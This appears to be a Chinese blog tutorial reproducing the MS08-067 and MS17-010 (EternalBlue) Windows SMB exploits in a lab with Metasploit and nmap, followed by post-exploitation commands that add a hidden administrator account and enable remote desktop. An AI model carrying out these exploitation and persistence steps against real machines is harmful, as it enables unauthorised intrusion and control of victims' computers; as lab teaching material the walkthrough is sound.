Kali之MSF的MS08-067漏洞复现详解

Posted 2023-03-29 薇琴娜酒店

1、MSF初识：

MSF即Metasploit Framework，是一个综合性的渗透测试工具，集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。
目前安装的kali都自带MSF，可以直接在图形界面打开
也可以在kali的终端通过使用命令msfconsole来打开。

2、MSF的目录结构和基本命令

1）msf的安装目录：

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/metasploit-framework/
或者2022版kali以后（在这之前的版本不知道可不可行）的直接桌面按如下步骤找到msf安装目录。

2）msf主要目录：

2.1、modules目录，子目录是一些用于渗透攻击的模块。

①auxiliary模块：主要包含渗透测试过程中所需的一些辅助性脚本，这些脚本有扫描、嗅探、破解、指纹识别、注入、Dos攻击等功能。
②encoders模块：编码工具，用于躲过入侵检测和过滤系统。
③exploit模块：即渗透攻击模块，利用系统漏洞进行攻击的动作，此模块对应每一个具体漏洞的攻击方法，攻击方法包括主动攻击（active exploit)和被动攻击（passive exploit），
④nops模块：参考了两位大佬的解释，过程略有偏差，但最终意义相同，看你怎么理解：
&由于IDS/IPS会检查数据包中不规则的数据，所以在某些场合下(比如针对溢出攻击)，某些特殊的滑行字符串(NOPS x90x90…)会因为被拦截而导致攻击失效，这时需要修改exploit中的NOPs.nops文件夹下的东西，会在payload生成时用到。如打开php的NOPS生成脚本，就会发现它返回了指定长度的空格。
&提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时，常常要在真正要执行的Shellcode之前添加一段空指令区， 这样当触发渗透攻击后跳转执行ShellCode时，有一个较大的安全着陆区，从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败，提高渗透攻击的可靠性。
⑤payloads模块：攻击载荷，是攻击者发送给系统执行的指令的。payload主要是在目标机执行的，exploits是在本地执行作用于目标机。分为3种类型的payloads，分别是single、stages和stagers。

single：all-in-one。完整的payload，这些payload都是一体化的，不需要依赖外部的库和包。
stagers：目标计算机内存有限时，先传输一个较小的payload用于建立连接
stages：利用stagers建立的连接下载后续payload 

⑥post模块：该模块exploits执行成功后，向目标机发送一些功能性指令，进行一系列的后渗透攻击动作，如获取敏感信息、跳板攻击、提权、获取hash等。

2.2、data目录

存放 meterpreter、passivex、vnc等工具和一些用户接口代码，wordlists等一些其他模块用到的数据文件

2.3、plugins和scripts目录

plugins是一个插件目录，需要用load加载，它提供数据库连接插件的功能和各种渗透攻击的插件。
scripts目录里面存放都是meterpreter利用的脚本。

3）MSF基本命令

①启动与关闭：
启动：msfconsole 正常启动
msfconsole -q 不显示msf的logo
关闭：exit
②问号(?)命令：查看所有的命令或某一命令的使用方法

命令	功能
back	从当前环境返回
banner	显示一个MSF banner
color	颜色转换
connect	连接一个主机
info	显示一个或多个模块的信息
irb	进入irb脚本模式
jobs	显示和管理作业
kill	杀死一个进程
load	加载一个插件
loadpath	在一个路径搜索并加载模块
quit	退出MSF
resource	运行存储在一个文件中的命令
route	查看一个会话的路由信息
search	搜索模块名和描述
set	给一个变量赋值
setg	把一个值赋给全局变量
show	显示所给类型的模块，或所有模块
sleep	sleep函数，睡眠时间
unload	卸载一个模块
unset	解除一个或多个变量
unsetg	解除一个或多个全局变量
use	通过名称选择一个模块
version	显示MSF和控制台库版本号

3、MSF之MS08-067漏洞攻防还原

1、ms08-067漏洞介绍

MS08-067漏洞是2008年的一个特大漏洞，该漏洞目前早已修补。ms08_067漏洞是的著名远程溢出漏洞，它的影响范围非常大，甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windows server 2003、windows xp。
这里需要xp系统的推荐这篇文章：
Windows xp下载

2、攻击过程/步骤

环境准备：
靶机：Windows xp sp2 ，IP地址：192.168.231.34
攻击机：kali 2022.1 ，IP地址：192.168.231.124
步骤：
先确认攻击机和靶机之间是可以ping通的。
先是xp系统，也就是靶机ping攻击机，ping成功。
拿kali去ping靶机xp系统也能ping得通。
既然两台机器之间能互相ping通，现在可以开始对漏洞信息得搜集和攻击了。

使用netstat -an查看xp系统都开放了哪些端口，是否开启了445端口。可以看到445端口已开启。

现在利用kali的nmap工具对xp系统进行信息搜集看是否存在ms08-067漏洞。
使用命令：
cd /usr/share/nmap/scripts/
先进入nmap得漏洞插件目录，ls 查看存在ms08-067模块。
现在使用命令：nmap --script=vuln 192.168.231.34对靶机进行漏洞扫描：主机存活，且445端口开放。
开启msf，用search命令查看可利用模块。
①使用命令use exploit/windows/smb/ms08_067_netapi进入模块里。
②命令没写完就敲回车了，一个小错误。
③show options命令查看相关的使用说明。
设置好RHOST和LHOST后，在show options一次，可以看到已经设置好，待触发攻击。
用exploit命令开始对靶机发起攻击。如下：已成功渗透攻击靶机到后台。
现在可以通过命令行对靶机进行创建文件夹、查看目录或者新建文件等，甚至对靶机有危害的操作或行为。。。。。。
至此，MS08-067漏洞的复现结束。感兴趣的可以自己想着怎么做到攻击成果最大化。

MS17-010（永恒之蓝）漏洞分析与复现

文章目录

• • • 一、漏洞简介
    • • 1、永恒之蓝介绍:
      • 2、漏洞原理：
      • 3、影响版本：
    • 二、漏洞复现
    • • 复现环境：
      • 复现过程：
      • • 1、主机发现：
        • 2、使用MSF的永恒之蓝漏洞模块
        • 3、使用ms17-010扫描模块，对靶机进行扫描：
        • 4、使用ms17-010攻击模块，对靶机进行攻击
        • 5、得到靶机shell
        • 6、通过shell对靶机进行控制

一、漏洞简介

1、永恒之蓝介绍:

永恒之蓝漏洞（MS17-010），它的爆发源于 WannaCry 勒索病毒的诞生，该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的漏洞 “EternalBlue”（永恒之蓝）进行改造而成 。勒索病毒的肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。据统计，全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理：

永恒之蓝漏洞通过 TCP 的445和139端口，来利用 SMBv1 和 NBT 中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本：

目前已知受影响的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞复现

复现环境：

• 攻击机：Linux kali（IP：192.168.50.130）

• 靶机：Windows 7 Enterprise with Service Pack 1 (x64)（IP：192.168.50.132）

实验条件：两台机子可以相互ping通，并且靶机（无补丁）开启了445端口，防火墙是关闭的！

复现过程：

1、主机发现：

登录 kali linux，用 nmap 探测本网段存活主机

nmap 192.168.50.0/24

可以看到，靶机的445端口是开放的，而永恒之蓝利用的就是445端口的SMB服务，操作系统溢出漏洞。

2、使用MSF的永恒之蓝漏洞模块

打开MSF：msfconsole

MSF每次打开都会有一个随机的界面，花里胡哨的，不过我喜欢 ~(￣▽￣)~

搜索 ms17-010 代码：search ms17_010

这里可以得到一些工具，其中
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块， exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
一般配合使用，前者先扫描，若显示有漏洞，再进行攻击。

3、使用ms17-010扫描模块，对靶机进行扫描：

使用模块：

use auxiliary/scanner/smb/smb_ms17_010

设置目标IP或网段：

set rhosts 192.168.50.132

执行扫描：run

如果出现以上情况，就说明存在漏洞。

4、使用ms17-010攻击模块，对靶机进行攻击

使用模块：

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标IP

set rhosts 192.168.50.132

可以使用 show options 命令查看设置选项

执行攻击：exploit 或 run

攻击完成！

5、得到靶机shell

输入：chcp 65001 可解决乱码问题。

解决了，但是没有完全解决。

6、通过shell对靶机进行控制

1、创建新用户 ，语法：net user 用户名 密码 /add

输入：

net user sss 123456 /add

查看用户信息，命令：net user

可以看到添加成功了。

2、将用户sss添加至管理员组

net localgroup administrators sss /add

3、开启远程桌面功能

查看3389端口状态：netstat -ano

看到3389端口并没有开启，开启3389端口，命令：

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3389端口开启。

4、远程桌面连接靶机

rdesktop 192.168.50.132:3389

使用创建的sss用户进行登录

登陆成功！

上面这是一个简单的演示，告诉大家这个漏洞很危险，真正的攻击能做的事情更多。